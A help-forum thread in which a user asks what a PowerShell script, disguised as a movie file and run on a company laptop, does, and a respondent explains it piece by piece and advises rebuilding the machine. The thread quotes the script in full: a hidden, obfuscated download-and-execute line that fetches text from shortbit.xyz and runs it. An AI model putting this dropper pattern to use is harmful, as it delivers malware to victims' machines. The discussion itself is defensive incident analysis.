- This topic has 2 replies, 2 voices, and was last updated 1 year ago by
June 23, 2019 at 5:29 pm #162461
I’m looking for clues here. Long story short, one of our users ran what he thought was a movie file on his company laptop. But the file isn’t a actually a movie but a Powershell script. Well said he double-clicked on the “movie file” but nothing happened, but I suspect something did happen.
Script is below:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char]@(0x69,0x65,0x58) -replace ‘ ‘,”;sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString(‘httpp://shortbit.xyz/psp’);s $nq
Could the experts chime in and tell me what this script does or attempt to do? I did check on the URL “shortbit.xyz/psp” in the script and it points to a link to a text file. I’m assuming it’s a text file that the script will use?
June 23, 2019 at 9:08 pm #162513ParticipantTopics: 1Replies: 302Points: 148Rank: Participant
Let’s break it down:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1
This runs powershell.exe in a hidden Window with ExecutionPolicy set to UnRestricted, which allows unsigned scripts to be run.
$ag=[string][char]@(0x69,0x65,0x58) -replace ' ',"
This sets the variable $ag to ieX, which is an alias for the Invoke-Expression cmdlet.
sal s $ag
sal is an alias for Set-Alias.
s is now an alias for Invoke-Expression
This sets the $nq variable to the content of the text file.
This runs Invoke-Expression against the text that was previously downloaded.
Without knowing the content of the text file it’s not possible to tell what happened next. My guess would be it’s some kind of dropper for malware, possibly ransomware.
You should consider the machine compromised, remove it from the network and rebuild it.
June 24, 2019 at 1:01 am #162519
- The topic ‘need help with identifying actions of a malicious code’ is closed to new replies.